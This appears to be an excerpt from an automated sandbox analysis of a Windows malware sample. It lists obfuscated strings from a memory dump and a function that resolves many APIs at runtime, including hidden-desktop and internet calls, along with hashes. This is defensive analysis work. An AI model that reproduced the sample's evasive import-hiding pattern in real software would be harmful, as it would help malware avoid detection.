6ZXV1RGABCSOSZX3QRE6H, xrefs: 00402FDA
8I3RLMHPV0, xrefs: 004032A9
LLNISU, xrefs: 004042A7
ORTL64XJP, xrefs: 0040316F
247MNQUA0VS4WDI6P3C, xrefs: 00402D93
1GIO244GJEKRHOML0BXZPR5LZDZP1787, xrefs: 0040319B
EZZQFI6YFS28SXU0P, xrefs: 004039B0
NP42LPE6NTKJIPOFHTJH, xrefs: 00402FC4
SSKX, xrefs: 00404481
R5Y, xrefs: 00403F0F
4DPIZ1UYKOEX, xrefs: 00403E59
I0EGI9E558V65OM12, xrefs: 00403F3B
B0X626322JWL, xrefs: 00403860
+$#24?&, xrefs: 00402DAB
eF?, xrefs: 004037C8
27PEQ, xrefs: 00403E88
YVPYQ83L4BR, xrefs: 00403238
!*90,$g8=Z!<], xrefs: 00403D66
"Y[W , xrefs: 004048EA
95P3Q0D5A04ULQHZ36, xrefs: 00402ECC
0IQL9LBPOKCIB, xrefs: 004040BA
"[;$Y&#, xrefs: 00403AC3
NJFBL5W8TJ8Z, xrefs: 0040331A
MA6K, xrefs: 00403929
62MCQVL5, xrefs: 004037C3
-/4 yj, xrefs: 00403BEA
JMVWEI, xrefs: 00404642
&_9 >21j!I6 #Q, xrefs: 00403D3A
1ZRH6D5R, xrefs: 004040A4
3VYAAMSDN, xrefs: 0040401D
09HR8DQMFIOE, xrefs: 0040412B
V602N, xrefs: 004048E5
WWGLHTHUZH6, xrefs: 00403F96
k-V0v]U3, xrefs: 00403103
WLLR8CBZRGFGF, xrefs: 00403ECA
W3U0AGZ193P56IW, xrefs: 004039C9
VUXILS48W2K, xrefs: 00402F0E
Y5CLH5KFJZ20APSX2GA3OPJEJQCA0T6RO61JV7, xrefs: 0040481C
UU3IJG6U6HF, xrefs: 00404239
F4QS1UTK, xrefs: 00402EF8
ZKXRXR9N0IABXQ5NXQ, xrefs: 00402E87
YNL83D735SBAZ, xrefs: 0040435D
.<#8_#Bo"[+, xrefs: 004032C4
eCS%^d7FQ, xrefs: 004046CE
8HTD6M5XLBXXAEGOEPK, xrefs: 004047ED
GN6VB8796STLC5Y4, xrefs: 0040324E
6FG2VEJN, xrefs: 00404616
G72BKODPRL9UVNKI8UR4KVBRC7PMW81Y, xrefs: 00403B45
QZDGOULLO7OMKVZQF, xrefs: 00403CC4
44'56%8)+g.>8!5#", xrefs: 00403CC9
<9208X0Jz.T6, xrefs: 0040331F
UAGQEI4VHBGKOEPXV2YOL, xrefs: 004035D3
YUTII8HXE3MP, xrefs: 00404671
VIF9Y8FLAFNEOXI4WVNPME7BLIP9E72NI0WBXC, xrefs: 004048A3
7TCK900JRY, xrefs: 00403FD8
E0VKWWBDR8ZIW4, xrefs: 00403D35
^_6<;qs, xrefs: 00403A55
P187S2MTWJ7C, xrefs: 0040427B
KLEYI, xrefs: 00404848
C2UD3, xrefs: 004042D6
3VV5, xrefs: 00404874
UULY9G3S, xrefs: 00404112
WKVW59R5L, xrefs: 00404302
UNRX5AV5ZU0, xrefs: 004032EE
0OYGCWBFG, xrefs: 0040308D
B58QKDXQS, xrefs: 004048FB
IDMLVKKCL, xrefs: 00403DBC
DB627, xrefs: 00403A37
p<':\:5, xrefs: 00403C58
-0?\, xrefs: 00403CDF
AHHA983U1KUD9, xrefs: 0040372B
RQINEMHK46T2J, xrefs: 004041F4
IOPDZLL, xrefs: 00402DA4
X*./, xrefs: 004042F1
Z*A+<9f4:\, xrefs: 004032AE
U=-R?[,, xrefs: 00402EA2
37M83879LFKZTZ, xrefs: 004037D9
9H7T049V, xrefs: 004030FE
1?#?!*7`j, xrefs: 00403A10
BGCXRA3EEHTRPV, xrefs: 00404766
O4B949Z8ZDD, xrefs: 00404795
X-",.wq, xrefs: 00403BD1
RMCC42A5JXTSU6CJFFZY1AJ4, xrefs: 004033A1
DU3JRKPEO, xrefs: 004031C7
W1DHVOD9OKI7, xrefs: 00403891
HXV41AA7, xrefs: 004046DF
'%\DSdo1+Y$^<n*;W,, xrefs: 00403902
2LSQ2ARW85CZR322RX9M, xrefs: 004046B3
37EEUKN5YHLCN, xrefs: 00403670
794U49DDT81AO, xrefs: 004038D1
aR", xrefs: 00403675
QYV5AI3O0, xrefs: 004030A3
2IU2KOI58WA, xrefs: 00403591
IKHF7TAS, xrefs: 004045D1
O6M4FIECE0W0UL141ZP, xrefs: 00403267
OY34MJYNS83T, xrefs: 00404199
UFN8, xrefs: 004048B9
#8E^:?9=$G:}@:4P0\, xrefs: 00403D50
1A4_FS, xrefs: 00403865
R3F0, xrefs: 00403B03
OCBD9NMPGCJD92YI6, xrefs: 004044C3
ONAPQ12ITZFBA, xrefs: 0040399A
H82N9OOK9WOFU765HG, xrefs: 00404750
IA4OT56QZZ7L2YC, xrefs: 00403DE8
MDW5NZAM3XYLZ0GOJJQGZSBK93LB8KF4N22NSYTH6KNOCI011Z283F23CL6TO8OTR476825V0JJPFWI1DUKJRHBIA, xrefs: 0040458F
7HP5N8D8RR9RAV2JAZG, xrefs: 004035BD
WJKZOTR, xrefs: 00403AA8

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateEntryPoint.ProcessProtectVirtualstrlen
String ID: '%\DSdo1+Y$^<n*;W,$ , >6$!"8I$o\?"$!*90,$g8=Z!<]$!./($"@6>$"Y[W $"[;$Y&#$"^Tw}a7+ $#81):$#8E^:?9=$G:}@:4P0\$#^^C<Y#gy.[/$$-:+?>_9$$@(!"*wf<?,G$%7*8#0#A$&6/";>cZB6<$&_9 >21j!I6 #Q$):]?+[$+$#24?&$,'Z.c$,P+1&/1$-/4 yj$-0?\$-?&6.0$."FQS[?$.($1<4@ 7;z$40$.<#8_#Bo"[+$02ARZOHLW7M6F$09HR8DQMFIOE$0IQL9LBPOKCIB$0JBKW2N$0OYGCWBFG$0YTGGRA2TEU4M84K7RP237DC7O68BBKFJYC1WGKVUA3VS43DRO334UP2UQI1VC1S4PVY6CX1G3H2ESUDV2QWIQKZ$0[$"$12YMHXSUP$164D4$1?#?!*7`j$1A4_FS$1A5J8MOF33PPO2I5$1BWAMWXC$1G;%@$1GIO244GJEKRHOML0BXZPR5LZDZP1787$1SH2$1X0841IK6$1X>0"C>$1XK3J7X$1Z2GNT7EJAKH64PDJE6ZA$1ZRH6D5R$20QUUKS$225W01JK2JL9RO4SWA8NKGUS$247MNQUA0VS4WDI6P3C$27PEQ$2IU2KOI58WA$2LSQ2ARW85CZR322RX9M$2MH6FBO8N$2VQUHW1LY6XZ$37EEUKN5YHLCN$37M83879LFKZTZ$3QAO8F7ID$3URUU7WPHXNA$3VOCT5QHIMG9XYQ$3VV5$3VYAAMSDN$3XOAIN1$44'56%8)+g.>8!5#"$469BE$46HCW$4DPIZ1UYKOEX$4E6JIMNGVAFLCPEL9$4ET1Z3AZ7Y9$4K26F4PFDC8W5PTMS$4Q7MA58Z3P6HQ2$4SWR32BUI8IK60I44$4UNBK20YE188ZS$4ZMAA3R7NQ0ACXZLEA901MFNJCBHERV3XC9SX9UWOP3Y$50XWPVDYWBCY59YNA$55JDTWEWYUECQV2JB5O9$5ABBM3JFAX2GM$5BLXFMQ$5F1L40P7Y41$5LJSHM1KRO6KC1NSU$5QY87XWZR90$5VPBNRA9QTT5Q80GOZG6$5X84TLOX$5rl$62MCQVL5$63SHZVX$676D34V29$6774N38Q6NM$6EK8MNUN8XNGO1UG$6EL52UD61D$6FG2VEJN$6FPAQMT3TLQ77T8NHVJ8LQP$6MKGIS4U$6QOTIRNQ142HC9FE7$6S8C1MLYCTAVGLD7$6ZR6H79MGEJ$6ZXV1RGABCSOSZX3QRE6H$70XOH443R3P8S9IF1UT$7134XW$794U49DDT81AO$7CXXV$7EE1TZXI747Z4EVRINOF6QJQPQCPR3YYZZIZSXQS0TYQ$7EUII00ENJMDE9$7HP5N8D8RR9RAV2JAZG$7TCK900JRY$7THKKUG47XPPSY$7ZKA$867&<V<+kK <$8:I.&2S{R$*$8HTD6M5XLBXXAEGOEPK$8I3RLMHPV0$8KH2938536IK3283GHT5NYQCFP4XFBK2Z6ASX30QKTL0AQK1LPK9SMXK4EWU9K02VPV72QFNRCU3M0CYFCMZ0LKMJ$8RS4S0ER30ZFKGSEDZ2$8UTN3HL$8V2EMRJH7SMUO3$95P3Q0D5A04ULQHZ36$9BIPJYDH7YMADQ0T7G4CCH45$9H7T049V$9JNNHYM62EAKHU7U$9LHPM9NWMQVB$9LP53MZ1QUT1WXAZKP15$9NPJCG2BR8OVEXFK8US6LJ$9P4ZXAS5LCRT9PZ$9QKL6ZZEOPMFN1WXHXL$9TG5IWTAH9IEGIAG$9dq$<9208X0Jz.T6$=1'\$>2;r$? *RP5Vxg$A4TO0CP$A5XBGHT$A9KOB6DYJZ2TQKFY5W$AHHA983U1KUD9$AHZW0XV4O0VRCI6R05Z9D1ET73J$AIBODJ3404COEOLM1F1TPDWG29LHV4T0TJM3$AOUE66QRUDV4YP6L0T7OF0D1N5AH$B0X626322JWL$B58QKDXQS$B<.F$BD7GYLC8NPR1W2CSOERUPZL$BEKTA6THS73MCO889BB$BF7K7C$BGCXRA3EEHTRPV$BQBG5QHFE5IPGRFH8I$BVCC3$BWOCJU2Q890AYGKS$BYIRR$C2UD3$C2YZK9TXJ4LKH$C3OTRRVOQU0G92$C47J628263XKBM7GYQ5SXX5R8VH0X7EYE0M12UBHK3BJESJC$CEYAN6$CFSFAOD8OO4YQNWAPYOQELV$CIZI0WIKHXVGB6Y2IB4I$CJCBZGDEX4$CWLE8IV57XQ144LN5S2UJF29CUJW65W6ZCVZ1SJRTLLMYE$D"J!$D4LA60S1UY0PM9$D6?/3]0*e&+1$D9#-,:B$DB627$DFWDYIUZJ22EGGY38SR6CNCUUPOVX6OXO5CGYOWU9PGB3AA5XT3GODNZCCTJ49CMNEZLERET676XHB1TPS7DCIJLS$DGZ6OYKHPK66O93KPHKOP$DGZY3DKF2RAXG$DIOTZGPUIDP81JDD08RA6SR$DIRECLQKDT9ZFOQ2JKF0QYTQO1F871LSKBZHN1FL015RKLZJFA9UBZQPZBZLG$DM9UTNL9Z70D8$DS7W3QWTCNITHRKL3$DU3JRKPEO$DWGK7QYAVDN3MF$E0NOBBX3VFFCY5$E0VKWWBDR8ZIW4$E6PW5S3X3ZS30R3RUB5G4$EEM8BD93OWRG9C5JCKHNN$EW73RVJIK5CS3KX9D9$EXNDYW3U$EYD045CZNM7TNL9WH0$EZZQFI6YFS28SXU0P$F4QS1UTK$F8GDYOTZ84KUI0V9$FA0PYQR9WT5M$FNCFFKT1OB9IAIVSNRPD$FW24NG8QUX$F_&/38+$G72BKODPRL9UVNKI8UR4KVBRC7PMW81Y$G7SDZ3N$GE.-}$GEEOPUQ2$GGCM$GIERBVIEJQ$GLPM6LI4EC2MGGSIZL0$GN6VB8796STLC5Y4$GVFMK5IQ6V056DOFJWSC3NY8XYPLQISGQV7C41LYRZ75MSRMADQ3KRG36HYWQ69YDTOKFMKRL3UEP3WEGCLM2Y59P$H82N9OOK9WOFU765HG$HC9BJA5YW3I4HQ7$HDA86SDVU32GR9H$HIKDVROCUL$HK4454G$HNO285K$HVKWD7F58IZ$HXV41AA7$I0EGI9E558V65OM12$I0LDI0FJL3167DJJ47TH0UK3$I54RB59PNCIBF$I7YL41DJM49$IA4OT56QZZ7L2YC$IDMLVKKCL$IFVO9PLL$IKHF7TAS$ILHYB7J9NEW9OKY$IOMKSCTFU3YEJI6C52X1$IOPDZLL$J16VQQHQ328OW038AIW8C12KO02$J7R8H10LX$JEV8$JL1CJEHP$JMVWEI$JTJPXU2E$JYHKUMM01YR$K00J$K1NGQM6LLKK42Y4RPU3TAA22CBEFTCFQ9SL6RQ382DHG09106U906HIJ8UDPH02IF35JM8A904072WCCJOJ8DOT1KB76MN1CK9B6ERN8T99BQLRMSBF2$KCBIO0RNNL3SD$KCIFFUPOYQ4P62NYGDGKF4EFSR9$KD9LA$KLEYI$KQLOMY1T0KT271AEOM$KSQXI5Z587CLB23N3$LGV5FW0I2M532IFQ5NADDLL4VRBFEG$LJRXREISH4UUB$LKNQWSPO6P$LLNISU$LR373LGLPEXJRWH00F9G4IRCO631P$LR7WSA6RDH8UVCBIXFBQND2RVX$LYLCU7TKK0ZRJA$LZHUIDS4T49$M21DOOSGL$M2GEEZN6FXEX9F$MA6K$MARXDNG$MC3EIPTJ26$MDW5NZAM3XYLZ0GOJJQGZSBK93LB8KF4N22NSYTH6KNOCI011Z283F23CL6TO8OTR476825V0JJPFWI1DUKJRHBIA$MDX$N2E7QII21BJ$N7XUE$N8LMMS0LWV$NC392JRLSY9R2XSZR1GC23PJSKHZ4VYFJ80DFK2X3X4K1K071HMKA3OTWTRRC1R6A4I46PTG8TJF9ERHUK7XJOEQTHQW3LV$NJFBL5W8TJ8Z$NM998DK6PJHVFRRGNQ8SO9$NP42LPE6NTKJIPOFHTJH$NR8Z0MZA57V59DR6B$NRP9MY52K8GS67O5H7$NWTYCU$O)<;&-$[Wtu{f1[9$O01HMOKNZGBVX$O1QVUGF5IKWPHC$O4B949Z8ZDD$O6M4FIECE0W0UL141ZP$O9J7QTH8GW8ST8071J3646N9YGXEQMMLSQ9K2$OBL31A0P0MEFEF8KU6K8M912TUK63BH$OCBD9NMPGCJD92YI6$OE4M1BPRYSEQ$OH8ZI73PUH8$ONAPQ12ITZFBA$ONL59AMD55LGQQYMKN32H4Z$ORE49Y3BG$ORTL64XJP$ORTTWVFLZFQ7PLH8$OY34MJYNS83T$P187S2MTWJ7C$P33305812EABACY7$P9ZYJXYTI$PCPYRVPP2TEGV3Q0$POVVYGTUD9CRH4ACCXMQ$Q>;F$BJc#)&$QFXSIWIKL6HH8$QG02VX4$QQY9MA8SN$QXIM5OX491F49$QYV5AI3O0$QZDGOULLO7OMKVZQF$R2NCCGYK$R3F0$R5Y$RMCC42A5JXTSU6CJFFZY1AJ4$RNW6AZOM$RQINEMHK46T2J$R_U'6$S5FQ0IQ$SAJKKQMM8WIT94XZN4FQI3$SDAOFIFV$SJAA1R9KR0N$SMLHROEZJ$SRMA50JYUUDVNSOSF9$SSKX$STXDWY70VR305A$SVG78EO6UTRH$SVI506W0RD5Q3R1HW8N$SYS5QZHE21QR5Z2RGWOLVHKN$T4JG$TB1IVWMJKB83QK8SFLM5ZMSTY5PP5SUMJKFCJ5Y7XXJFUDMBE53$TH8UTCCT8G$TIYQA59R78LBD$TJURCJ$TM56KHVNU8HQMK4I$TNIK5Y8XHUZ$TPAPbw$TPSSH93KSA5WM$TRJSY1SL$U=-R?[,$UAGQEI4VHBGKOEPXV2YOL$UCX82KBAS9RL$UEZI4L1BOO6UDG$UFN8$UNRX5AV5ZU0$URJRMRD7AVAY6AF8$UU3IJG6U6HF$UULY9G3S$V3UW4I45XC5B67GY$V602N$V9DBY6KX$VC949JPGG9Y$VIF9Y8FLAFNEOXI4WVNPME7BLIP9E72NI0WBXC$VRURR9JBP0IKV7ZQ$VT6VR$VUXILS48W2K$W1DHVOD9OKI7$W2WBQ4K4$W3U0AGZ193P56IW$WF15HHCZ9$WGEYUAY7PCFYG$WHG4K95ZKOF4BHCCGQTV84O84KPP46GAZB4R7LEUPVETJSJOWN92U9A23IAAUP5NHEE9MVF4L9GMZ$WJKZOTR$WKVW59R5L$WLLR8CBZRGFGF$WOMW9NEVZXJ94VXCSD7QM4E$WPK$WQQ4POW8OYX1IR40$WU9UKK5WL8WX4TS$WWGLHTHUZH6$X*./$X-",.wq$X89Z4I8VD9RSUA3YGFQ$X8I9C4UFYJ$XIOQ8N6097H1IN8CYKIFJ7HVGC0QM5HMQK8G5L7RHDCX5LUTOHR8KYL0B3J5WQNDZ5K8P1HNM08F5U05SHBENJC18IFBBB40Z889AVEX9EWUZF4QDONPOJ0Q3T9$XV8DBU63OQUC$Y1MDM1G$Y36CZRHXY$Y5CLH5KFJZ20APSX2GA3OPJEJQCA0T6RO61JV7$YNL83D735SBAZ$YUMQ1F6AF7G$YUTII8HXE3MP$YVPYQ83L4BR$YW0YGAZAZ2SM1DI4L$Z*A+<9f4:\$Z2KY96N$ZAZUGJW$ZCWT$ZKXRXR9N0IABXQ5NXQ$ZMYQRF2LE2S1Q9I$ZUPUK1XWU$ZV1FXP4PU7QJ$]G570$^_6<;qs$a#5%E 2dc"6$Vna&=X $aR"$d#(;]$eCS%^d7FQ$eDH>$eF?$f,84><F1$hx*-Z$k-V0v]U3$p0!;' 4gC9"$&)$p<':\:5$q?,$s4T)xY2E8FH$t&/1$x(v$AX Al${9g+$<#<^2!<5V$~P$u8\!t5DF<.$<?@w
API String ID: 2988880869-1085699239
Opcode ID: 58bf21ad750b112b192c41fa3ad5f3a2694b8261c1de9c9a436e75b25418f723
Instruction ID: 44aef7ba8ce6175df087879de36b1a055a4d9db91537e36bdd44e36747a435c7
Opcode Fuzzy Hash: 58bf21ad750b112b192c41fa3ad5f3a2694b8261c1de9c9a436e75b25418f723
Instruction Fuzzy Hash: 9EC293F0BD130079D610AB756D07F86B5556B98F1AF21793FBA407B2D2EAFC62044A8C

Function 00426710 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00915A80), ref: 00426725
GetProcAddress.KERNEL32(75900000,00915B80), ref: 0042673D
GetProcAddress.KERNEL32(75900000,00921C50), ref: 00426756
GetProcAddress.KERNEL32(75900000,00921C98), ref: 0042676E
GetProcAddress.KERNEL32(75900000,00921D10), ref: 00426786
GetProcAddress.KERNEL32(75900000,00921C68), ref: 0042679F
GetProcAddress.KERNEL32(75900000,0091A0A8), ref: 004267B7
GetProcAddress.KERNEL32(75900000,00921C80), ref: 004267CF
GetProcAddress.KERNEL32(75900000,00921B00), ref: 004267E8
GetProcAddress.KERNEL32(75900000,009219C8), ref: 00426800
GetProcAddress.KERNEL32(75900000,00921B60), ref: 00426818
GetProcAddress.KERNEL32(75900000,00915CE0), ref: 00426831
GetProcAddress.KERNEL32(75900000,00915BA0), ref: 00426849
GetProcAddress.KERNEL32(75900000,00915940), ref: 00426861
GetProcAddress.KERNEL32(75900000,00915980), ref: 0042687A
GetProcAddress.KERNEL32(75900000,00921BA8), ref: 00426892
GetProcAddress.KERNEL32(75900000,00921A58), ref: 004268AA
GetProcAddress.KERNEL32(75900000,00919EC8), ref: 004268C3
GetProcAddress.KERNEL32(75900000,009156A0), ref: 004268DB
GetProcAddress.KERNEL32(75900000,009219F8), ref: 004268F3
GetProcAddress.KERNEL32(75900000,00921B18), ref: 0042690C
GetProcAddress.KERNEL32(75900000,00921968), ref: 00426924
GetProcAddress.KERNEL32(75900000,00921950), ref: 0042693C
GetProcAddress.KERNEL32(75900000,00915700), ref: 00426955
GetProcAddress.KERNEL32(75900000,00921A70), ref: 0042696D
GetProcAddress.KERNEL32(75900000,00921AB8), ref: 00426985
GetProcAddress.KERNEL32(75900000,00921B30), ref: 0042699E
GetProcAddress.KERNEL32(75900000,00921AA0), ref: 004269B6
GetProcAddress.KERNEL32(75900000,00921A28), ref: 004269CE
GetProcAddress.KERNEL32(75900000,00921B78), ref: 004269E7
GetProcAddress.KERNEL32(75900000,00921BF0), ref: 004269FF
GetProcAddress.KERNEL32(75900000,009219E0), ref: 00426A17
GetProcAddress.KERNEL32(75900000,00921998), ref: 00426A30
GetProcAddress.KERNEL32(75900000,009193C8), ref: 00426A48
GetProcAddress.KERNEL32(75900000,00921C20), ref: 00426A60
GetProcAddress.KERNEL32(75900000,00921980), ref: 00426A79
GetProcAddress.KERNEL32(75900000,009158E0), ref: 00426A91
GetProcAddress.KERNEL32(75900000,009219B0), ref: 00426AA9
GetProcAddress.KERNEL32(75900000,00915880), ref: 00426AC2
GetProcAddress.KERNEL32(75900000,00921AD0), ref: 00426ADA
GetProcAddress.KERNEL32(75900000,00921AE8), ref: 00426AF2
GetProcAddress.KERNEL32(75900000,00915680), ref: 00426B0B
GetProcAddress.KERNEL32(75900000,009156E0), ref: 00426B23
LoadLibraryA.KERNEL32(00921C38,0042067A), ref: 00426B35
LoadLibraryA.KERNEL32(00921B48), ref: 00426B46
LoadLibraryA.KERNEL32(00921BC0), ref: 00426B58
LoadLibraryA.KERNEL32(00921C08), ref: 00426B6A
LoadLibraryA.KERNEL32(00921A10), ref: 00426B7B
LoadLibraryA.KERNEL32(00921B90), ref: 00426B8D
LoadLibraryA.KERNEL32(00921BD8), ref: 00426B9F
LoadLibraryA.KERNEL32(00921A40), ref: 00426BB0
GetProcAddress.KERNEL32(75FD0000,009155A0), ref: 00426BCC
GetProcAddress.KERNEL32(75FD0000,00921A88), ref: 00426BE4
GetProcAddress.KERNEL32(75FD0000,0091F4B8), ref: 00426BFD
GetProcAddress.KERNEL32(75FD0000,00925178), ref: 00426C15
GetProcAddress.KERNEL32(75FD0000,00915720), ref: 00426C2D
GetProcAddress.KERNEL32(734B0000,0091A0D0), ref: 00426C4D
GetProcAddress.KERNEL32(734B0000,009158A0), ref: 00426C65
GetProcAddress.KERNEL32(734B0000,00919F18), ref: 00426C7E
GetProcAddress.KERNEL32(734B0000,00925280), ref: 00426C96
GetProcAddress.KERNEL32(734B0000,00925298), ref: 00426CAE
GetProcAddress.KERNEL32(734B0000,009158C0), ref: 00426CC7
GetProcAddress.KERNEL32(734B0000,009157E0), ref: 00426CDF
GetProcAddress.KERNEL32(734B0000,00925088), ref: 00426CF7
GetProcAddress.KERNEL32(763B0000,00915800), ref: 00426D13
GetProcAddress.KERNEL32(763B0000,00915740), ref: 00426D2B
GetProcAddress.KERNEL32(763B0000,00925130), ref: 00426D44
GetProcAddress.KERNEL32(763B0000,00925070), ref: 00426D5C
GetProcAddress.KERNEL32(763B0000,00915760), ref: 00426D74
GetProcAddress.KERNEL32(750F0000,00919E50), ref: 00426D94
GetProcAddress.KERNEL32(750F0000,00919F40), ref: 00426DAC
GetProcAddress.KERNEL32(750F0000,009251F0), ref: 00426DC5
GetProcAddress.KERNEL32(750F0000,00915780), ref: 00426DDD
GetProcAddress.KERNEL32(750F0000,009157A0), ref: 00426DF5
GetProcAddress.KERNEL32(750F0000,00919E28), ref: 00426E0E
GetProcAddress.KERNEL32(75A50000,009251C0), ref: 00426E2E
GetProcAddress.KERNEL32(75A50000,009155E0), ref: 00426E46
GetProcAddress.KERNEL32(75A50000,0091F448), ref: 00426E5F
GetProcAddress.KERNEL32(75A50000,009252B0), ref: 00426E77
GetProcAddress.KERNEL32(75A50000,00925058), ref: 00426E8F
GetProcAddress.KERNEL32(75A50000,009157C0), ref: 00426EA8
GetProcAddress.KERNEL32(75A50000,00915820), ref: 00426EC0
GetProcAddress.KERNEL32(75A50000,00925268), ref: 00426ED8
GetProcAddress.KERNEL32(75A50000,00925118), ref: 00426EF1
GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 00426F07
GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 00426F1E
GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00426F35
GetProcAddress.KERNEL32(75070000,00915600), ref: 00426F51
GetProcAddress.KERNEL32(75070000,00925148), ref: 00426F69
GetProcAddress.KERNEL32(75070000,009252E0), ref: 00426F82
GetProcAddress.KERNEL32(75070000,009252C8), ref: 00426F9A
GetProcAddress.KERNEL32(75070000,00925160), ref: 00426FB2
GetProcAddress.KERNEL32(74E50000,00915900), ref: 00426FCE
GetProcAddress.KERNEL32(74E50000,00915840), ref: 00426FE6
GetProcAddress.KERNEL32(75320000,009156C0), ref: 00427002
GetProcAddress.KERNEL32(75320000,009250A0), ref: 0042701A
GetProcAddress.KERNEL32(6F060000,00915860), ref: 0042703A
GetProcAddress.KERNEL32(6F060000,00915920), ref: 00427052
GetProcAddress.KERNEL32(6F060000,00915540), ref: 0042706B
GetProcAddress.KERNEL32(6F060000,00925190), ref: 00427083
GetProcAddress.KERNEL32(6F060000,00915560), ref: 0042709B
GetProcAddress.KERNEL32(6F060000,009155C0), ref: 004270B4
GetProcAddress.KERNEL32(6F060000,00915580), ref: 004270CC
GetProcAddress.KERNEL32(6F060000,00915660), ref: 004270E4
GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 004270FB
GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00427112
GetProcAddress.KERNEL32(74E00000,00925028), ref: 0042712E
GetProcAddress.KERNEL32(74E00000,0091F348), ref: 00427146
GetProcAddress.KERNEL32(74E00000,009252F8), ref: 0042715F
GetProcAddress.KERNEL32(74E00000,009251D8), ref: 00427177
GetProcAddress.KERNEL32(74DF0000,00915620), ref: 00427193
GetProcAddress.KERNEL32(6C950000,009250B8), ref: 004271AF
GetProcAddress.KERNEL32(6C950000,00915640), ref: 004271C7
GetProcAddress.KERNEL32(6C950000,009251A8), ref: 004271E0
GetProcAddress.KERNEL32(6C950000,00925208), ref: 004271F8

Strings

InternetSetOptionA, xrefs: 004270F0
CloseDesktop, xrefs: 00426F2A
HttpQueryInfoA, xrefs: 00427107
OpenDesktopA, xrefs: 00426F13
CreateDesktopA, xrefs: 00426F01

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
API String ID: 2238633743-3468015613
Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0

Function 0041F300 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1164stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
